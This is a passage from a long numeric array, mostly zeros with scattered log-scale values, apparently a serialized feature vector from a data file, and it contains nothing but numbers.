0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.518263445217987, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 3.8005740880419454, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 4.1588830833596715, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 4.553876891600541, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.58351893845611, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, \n 0.0, 2.4849066497880004, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 3.4011973816621555, 0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.4825185607408002, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.4849066497880004, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 8.215149976722676, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.649511027115099, 0, 0.0, 0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.9512437185814275, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0, \n 3.044522437723423, 1.0986122886681098, 0.0, 0.0, 1.0986122886681098, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 4.160336650881089, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 5.2237778411112, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098,\n 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0, 0.0, 0.0, 0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, \n 0.0, 3.6375861597263857, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 7.16703787691222, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, \n 25.273805172346215, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453,\n 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.772588722239781, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 